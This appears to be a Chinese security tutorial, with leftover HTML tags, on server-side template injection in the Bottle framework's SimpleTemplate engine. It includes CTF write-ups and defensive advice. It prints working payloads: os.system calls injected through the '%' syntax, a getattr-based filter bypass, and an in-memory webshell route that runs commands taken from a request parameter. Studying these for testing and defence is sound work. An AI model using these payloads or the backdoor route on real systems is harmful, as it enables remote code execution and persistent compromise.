Bottle框架模板引擎安全分析与利用<\/h1>

1. Bottle框架概述<\/h2>

Bottle是一个轻量级的Python Web单文件框架，具有以下特点：<\/p>

单文件框架，仅包含一个.py文件<\/li>
零依赖，适合小型Web应用和嵌入式系统开发<\/li>
提供路由、模板、请求处理等基本功能<\/li>
自带WSGI服务器，也支持Gunicorn、Paste等服务器<\/li>

内置SimpleTemplate模板引擎(stpl)，支持Jinja2、Mako等第三方模板引擎<\/li> <\/ul>

优点<\/strong>：<\/p>

轻量级，零依赖<\/li>
API设计简洁，适合快速开发小型Web应用或API<\/li>
自带模板引擎和WSGI服务器<\/li> <\/ul>
缺点<\/strong>：<\/p>

功能有限<\/li>
性能一般<\/li> <\/ul>
2. SimpleTemplate模板引擎安全分析<\/h2>
2.1 模板渲染流程<\/h3>
Bottle的template()<\/code>函数负责解析并渲染模板，支持三种形式的模板输入：<\/p>
模板名称（文件路径）<\/li> 模板字符串<\/li> 模板对象（SimpleTemplate实例）<\/li> <\/ol> 执行流程<\/strong>：<\/p> 解析并合并args参数<\/li> 选择模板适配器（默认SimpleTemplate）<\/li> 生成模板缓存ID<\/li> 解析并缓存模板<\/li> 处理错误<\/li> 渲染模板<\/li> <\/ol> 2.2 SimpleTemplate语法<\/h3> SimpleTemplate支持以下语法特性：<\/p> 变量插入<\/strong>：{{variable}}<\/code><\/li> 逻辑控制<\/strong>：条件、循环<\/li> 代码执行<\/strong>：通过特殊语法执行Python代码<\/li> 过滤器和函数<\/strong><\/li> <\/ol> 2.3 代码执行方式<\/h3> Bottle模板引擎提供了多种代码执行方式：<\/p> 花括号语法<\/strong>：<\/p> {{expression}}<\/code>：执行单行表达式<\/li> {{!expression}}<\/code>：执行单行表达式<\/li> <\/ul> <\/li> 百分号语法<\/strong>：<\/p> % python_code<\/code>：必须在新行开头，前面只能有空白字符<\/li> 块级代码： <% multi_line python_code %> <\/code><\/pre> <\/li> <\/ul> <\/li> 直接执行<\/strong>：<\/p> % __import__('os').system('calc')<\/code><\/li> <\/ul> <\/li> <\/ol> 3. 安全漏洞利用<\/h2> 3.1 模板注入(SSTI)<\/h3> 当用户输入未经适当处理直接插入模板时，可能导致代码执行：<\/p> # 危险示例<\/span> <\/span><\/span>message =<\/span> request.<\/span>GET.<\/span>get('message'<\/span>, ''<\/span>) <\/span><\/span>return<\/span> template('message'<\/span>, message=<\/span>message) <\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p> 使用{{}}<\/code>或%<\/code>语法注入恶意代码<\/li> 绕过过滤技术（如花括号过滤）<\/li> <\/ul> 3.2 内存马注入<\/h3> 通过动态添加路由实现持久化后门：<\/p> # 获取app对象后注入恶意路由<\/span> <\/span><\/span>app.<\/span>route('\/malicious'<\/span>, method=<\/span>'GET'<\/span>)(lambda<\/span>: __import__('os'<\/span>).<\/span>system(request.<\/span>GET.<\/span>get('cmd'<\/span>))) <\/span><\/span><\/code><\/pre>实现步骤<\/strong>：<\/p> 获取Bottle应用实例<\/li> 使用route<\/code>装饰器添加新路由<\/li> 绑定恶意回调函数（常使用lambda）<\/li> <\/ol> 3.3 实际案例<\/h3> 案例1：GHCTF2025_Message in a bottle<\/h4> 漏洞分析<\/strong>：<\/p> 提交message时先经过WAF过滤{<\/code>和}<\/code><\/li> 使用join()<\/code>方法合并HTML片段<\/li> 直接渲染用户输入导致SSTI<\/li> <\/ul> 绕过方法<\/strong>：<\/p> 使用%<\/code>语法代替花括号<\/li> 示例payload：% __import__('os').system('calc')<\/code><\/li> <\/ul> 案例2：NCTF2025_ezdash<\/h4> 漏洞分析<\/strong>：<\/p> 模板渲染时过滤不严<\/li> 可直接传入代码执行<\/li> <\/ul> 绕过点号过滤<\/strong>：<\/p> 使用getattr()<\/code>代替点号访问属性<\/li> 示例payload： %<\/span> getattr(__import__('os'<\/span>), 'system'<\/span>)('sleep 5'<\/span>) <\/span><\/span><\/code><\/pre><\/li> <\/ul> 4. 防御措施<\/h2> 输入验证与过滤<\/strong>：<\/p> 对所有用户输入进行严格验证<\/li> 过滤或转义特殊字符（{<\/code>, }<\/code>, %<\/code>, <<\/code>, ><\/code>等）<\/li> <\/ul> <\/li> 安全模板使用<\/strong>：<\/p> 避免直接渲染用户输入<\/li> 使用安全的模板变量传递方式<\/li> <\/ul> <\/li> 最小权限原则<\/strong>：<\/p> 限制模板执行环境权限<\/li> 使用沙箱环境运行模板引擎<\/li> <\/ul> <\/li> 禁用危险功能<\/strong>：<\/p> 在不需要时禁用模板中的代码执行功能<\/li> 使用更安全的模板引擎（如Jinja2）并配置安全选项<\/li> <\/ul> <\/li> <\/ol> 5. 总结<\/h2> Bottle框架的SimpleTemplate模板引擎因其灵活的代码执行能力，在不当使用时可能带来严重的安全风险。开发者应当：<\/p> 充分了解模板引擎的工作原理和安全特性<\/li> 避免直接将用户输入插入模板<\/li> 实施严格的输入验证和输出编码<\/li> 定期进行安全审计和代码审查<\/li> <\/ol> 安全研究人员在测试时应关注：<\/p> 模板注入的各种语法变体<\/li> 过滤绕过技术<\/li> 持久化攻击向量（如内存马）<\/li> <\/ul>